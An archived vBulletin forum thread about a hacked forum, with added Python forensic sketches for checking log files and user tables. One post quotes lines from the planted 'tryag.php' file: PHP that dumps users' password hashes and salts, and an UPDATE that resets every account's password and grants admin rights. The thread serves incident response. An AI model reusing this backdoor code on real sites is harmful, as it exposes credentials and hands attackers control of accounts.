vb.org Archive

Jaggee 05-07-2014 04:06 PM

Hacked by "Tryag"
 
http://pastebin.com/6k6UYFYJ
That file got uploaded to my forum directory somehow, no clue how.

ForceHSS 05-07-2014 04:31 PM

It was uploaded from the FTP. Change the FTP, cPanel, and forum admin passwords. Check all files in the FTP, then once you have removed everything they uploaded, upload a fresh copy yourself. Also check if they logged into the admin panel; if so, check the logs.

Lynne 05-07-2014 05:12 PM

Your server logs should tell you how they uploaded the file. You should contact your host and have them look through the logs with you to figure out how this was done.

helmer.co 05-08-2014 09:17 AM

What was the file name and directory? Also, what version of VB4 are you running?

ForceHSS 05-08-2014 09:58 AM

Quote:

Originally Posted by Jaggee (Post 2496666)
http://pastebin.com/6k6UYFYJ
That file got uploaded to my forum directory somehow, no clue how.

If you check that coding, it's nasty. This is what I mean:
Code:

<td class="style5"><?echo $r[userid]?></td>
<td class="style5"><?echo $r[username]?></td>
<td class="style5"><?echo $r[email]?></td>
<td class="style5"><?echo $r[password]?></td>
<td class="style5"><?echo $r[salt]?></td>

And
Code:

$okey=mysql_query("UPDATE user SET password='e8be21235122e78d824eef4514b87be4',salt='oky',usergroupid='6'");

But there are even worse parts in the code to worry about in there.
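Added example, not part of the original thread or of the uploaded file: the UPDATE quoted above has no WHERE clause, so it overwrites password, salt and usergroupid on every row. The sketch below compares a known-good backup of the user table with the live table to show which accounts were touched and whether one (password, salt) pair now dominates. All rows are constructed, and it assumes accounts normally have distinct salts.

```python
from collections import Counter

FIELDS = ("password", "salt", "usergroupid")

# Constructed data: userid -> row, from a known-good backup and from the live table.
BACKUP = {
    1: {"password": "hash-admin", "salt": "k1Q", "usergroupid": 6},
    2: {"password": "hash-alice", "salt": "p9z", "usergroupid": 2},
    3: {"password": "hash-bob", "salt": "Wm4", "usergroupid": 2},
}
# What an UPDATE with no WHERE clause leaves behind: every row identical.
# User 4 registered after the backup was taken and was overwritten as well.
LIVE = {uid: {"password": "hash-attacker", "salt": "zzz", "usergroupid": 6}
        for uid in (1, 2, 3, 4)}


def changed_fields(backup, live):
    """Map userid -> list of fields that differ, for users present in both."""
    diff = {}
    for uid in sorted(backup.keys() & live.keys()):
        changed = [f for f in FIELDS if backup[uid][f] != live[uid][f]]
        if changed:
            diff[uid] = changed
    return diff


def mass_reset_summary(table, min_share=0.5):
    """Report the most common (password, salt) pair and whether it looks like a mass reset."""
    if not table:
        return {"pair": None, "accounts": 0, "share": 0.0, "suspicious": False}
    pairs = Counter((row["password"], row["salt"]) for row in table.values())
    (pair, count), = pairs.most_common(1)
    share = count / len(table)
    # Assumption: salts differ per account, so a pair shared by most accounts is abnormal.
    return {"pair": pair, "accounts": count, "share": share,
            "suspicious": count > 1 and share >= min_share}


if __name__ == "__main__":
    print(changed_fields(BACKUP, LIVE))
    print(mass_reset_summary(LIVE))
```

Every account flagged this way needs its credentials restored from backup or reset, and any group change reverted.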

Jaggee 05-08-2014 01:13 PM

Quote:

Originally Posted by helmer.co (Post 2496775)
What was the file name and directory? Also, what version of VB4 are you running?

Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.

Lynne 05-08-2014 05:14 PM

Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.
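Added example, not part of the original thread: one way to run the access-log check described in the post above. It finds the first request for the dropped file and lists successful POST requests in the window before it; an empty list is the "nothing in the access_logs" case. The log lines, IP addresses and the upload path are constructed, and the combined log format is an assumption.

```python
import re
from datetime import datetime, timedelta

# Assumed format: Apache/nginx "combined" access log.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

# Constructed sample lines; /forum/example-upload.php is a hypothetical path.
SAMPLE = [
    '198.51.100.7 - - [06/May/2014:10:00:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [06/May/2014:10:02:10 +0000] "POST /forum/example-upload.php HTTP/1.1" 200 812 "-" "-"',
    '192.0.2.44 - - [06/May/2014:10:05:30 +0000] "GET /forum/tryag.php HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.44 - - [06/May/2014:10:06:00 +0000] "POST /forum/tryag.php HTTP/1.1" 200 300 "-" "-"',
]


def parse(lines):
    """Yield one dict per parseable log line, with a timezone-aware timestamp."""
    for line in lines:
        m = LINE.match(line)
        if m:
            event = m.groupdict()
            event["ts"] = datetime.strptime(event["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield event


def upload_candidates(lines, dropped_file, window=timedelta(hours=24)):
    """Return (first request for dropped_file, successful POSTs seen before it)."""
    events = sorted(parse(lines), key=lambda e: e["ts"])
    hits = [e for e in events
            if e["path"].split("?")[0].endswith("/" + dropped_file)]
    if not hits:
        return None, []
    first = hits[0]
    posts = [e for e in events
             if e["method"] == "POST" and e["status"].startswith("2")
             and first["ts"] - window <= e["ts"] < first["ts"]]
    return first, posts


if __name__ == "__main__":
    first, posts = upload_candidates(SAMPLE, "tryag.php")
    print(first["ip"], first["ts"], [(p["ip"], p["path"]) for p in posts])
```

If the list comes back empty for the period the logs cover, the next places to look are the FTP, SFTP and control-panel logs.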

Jaggee 05-08-2014 06:29 PM

Quote:

Originally Posted by Lynne (Post 2496845)
Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.

When you connect with SSH, it instantly uses the command "sftp", which calls for the SFTP software to transfer files, basically like FTP. The shell logs (messages & secure) only show commands, not what happens inside the software. And sftp-server never showed any logs.

Lionel 05-09-2014 12:07 AM

The admincp of one of my sites once got hacked. They created a plugin that could be run via ranks.php and have complete control of my server. Since then I stealth protect that admin folder in addition to firewalling SSH and FTP. What was strange, but I never complained: the password I was using was unique and specific to only two sites, here and that site. Lucky for me, I basically live on my PC and I was able to catch that P0wersurge SOB instantly and protect myself.

helmer.co 05-09-2014 12:20 AM

Quote:

Originally Posted by Jaggee (Post 2496805)
Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.

When you say the latest version, you mean 4.22 PL1 with the install directory deleted, correct? It is really a shame your logs did not show anything. Do you suspect he hacked your root name and password?

Did you use them at any other sites?

